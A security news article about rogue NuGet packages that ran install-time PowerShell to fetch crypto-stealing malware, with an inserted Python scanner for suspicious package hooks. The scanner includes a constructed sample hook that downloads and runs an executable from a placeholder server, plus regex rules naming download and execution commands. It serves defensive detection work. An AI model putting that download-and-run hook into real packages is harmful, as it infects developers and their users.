Thursday, November 30, 2023
Rogue NuGet Packages Infect .NET Developers with cryptocurrency stealer malware
The NuGet repository is the target of a new “sophisticated and highly-malicious attack” aiming to infect .NET developer systems with cryptocurrency stealer malware. The 13 rogue packages, which were downloaded more than 160,000 times over the past month, have since been taken down.

“The packages contained a PowerShell script that would execute upon installation and trigger a download of a ‘second stage’ payload, which could be remotely executed,” JFrog researchers Natan Nehorai and Brian Moussalli said.

While NuGet packages have in the past been found to contain vulnerabilities and have been abused to propagate phishing links, this campaign marks the first-ever discovery of NuGet packages carrying malicious code.

Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API – alone accounted for 166,000 downloads, although it’s also possible that the threat actors artificially inflated the download counts using bots to make them appear more legitimate.

The use of Coinbase and Discord underscores the continued reliance on typosquatting techniques, in which fake packages are assigned names that are similar to legitimate packages, in order to trick developers into downloading them.

The malware embedded in the packages functions as a dropper: it automatically runs PowerShell code that retrieves a follow-on binary from a hard-coded server.

As an added obfuscation mechanism, some packages did not embed a malicious payload directly, instead fetching it via another booby-trapped package as a dependency.

Even more troublingly, the connection to the command-and-control (C2) server occurs over HTTP (as opposed to HTTPS), rendering it vulnerable to an adversary-in-the-middle (AiTM) attack.
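The two traits described above (an install-time PowerShell hook that downloads a second stage, and a plaintext http:// server address) are easy to check for before a package enters a build. The following is an added example, not JFrog's tooling or the article's code: it opens a .nupkg (a zip file) in memory, looks at the PowerShell hooks NuGet's legacy packages.config flow runs from the package's tools/ folder, and flags download, plaintext-HTTP and dynamic-execution patterns. The sample package and the c2.example.invalid host are constructed placeholders.

```python
import io
import re
import zipfile

# Install-time hooks NuGet runs from a package's tools/ folder (legacy packages.config flow).
HOOK_NAMES = {"init.ps1", "install.ps1", "uninstall.ps1"}

# The three things a dropper of the kind described in the article needs:
# a download primitive, a plaintext http:// URL, and a way to run what it fetched.
RULES = {
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer", re.I),
    "plain_http": re.compile(r"http://[^\s'\"]+", re.I),
    "dynamic_exec": re.compile(r"Invoke-Expression|\biex\b|Start-Process", re.I),
}


def scan_nupkg(nupkg_bytes: bytes) -> list:
    """Return one finding per PowerShell hook in the package, with the rules it matched."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(nupkg_bytes)) as zf:
        for name in zf.namelist():
            parts = name.lower().split("/")
            if len(parts) < 2 or parts[0] != "tools" or parts[-1] not in HOOK_NAMES:
                continue
            script = zf.read(name).decode("utf-8", errors="replace")
            hits = {rule: pat.findall(script) for rule, pat in RULES.items()}
            hits = {rule: matches for rule, matches in hits.items() if matches}
            findings.append({"path": name, "rules": sorted(hits), "urls": hits.get("plain_http", [])})
    return findings


def is_suspicious(findings: list) -> bool:
    """Flag a hook that both downloads and executes, or that talks to a plaintext http:// server."""
    return any({"download", "dynamic_exec"} <= set(f["rules"]) or "plain_http" in f["rules"]
               for f in findings)


def build_sample(script: str) -> bytes:
    """Constructed minimal .nupkg containing only the parts the scanner inspects (not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Example.nuspec", "<package />")
        zf.writestr("tools/init.ps1", script)
    return buf.getvalue()


# Constructed stand-ins: one hook mirroring the dropper behaviour the article describes, one benign.
DROPPER_STYLE = ("$u='http://c2.example.invalid/stage2.exe'\n"
                 "(New-Object Net.WebClient).DownloadFile($u, \"$env:TEMP\\s.exe\")\n"
                 "Start-Process \"$env:TEMP\\s.exe\"")
BENIGN = "param($installPath)\nWrite-Host \"Installed to $installPath\""
```

Run it as a pre-restore gate over the packages in your local feed or cache; a hit is a reason to read the hook by hand, not proof of malice, since legitimate packages can also download.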

The second-stage malware is what JFrog describes as a “completely custom executable payload” that can be dynamically switched at will since it’s retrieved from the C2 server.

The malware, written in a low-level language, delivers several capabilities that include a crypto stealer and an auto-updater module that pings the C2 server for an updated version of the malware.

The findings come as the software supply chain has become an increasingly lucrative pathway to compromise developers’ systems and stealthily propagate backdoored code to downstream users.

“This proves that no open source repository is safe from malicious actors,” Shachar Menashe, senior director at JFrog Security Research, said in a statement shared with The Hacker News.

“.NET developers using NuGet are still at high risk of malicious code infecting their environments and should take caution when curating open-source components for use in their builds – and at every step of the software development lifecycle – to ensure the software supply chain remains secure.”

Technogeek Online (https://technogeek.online)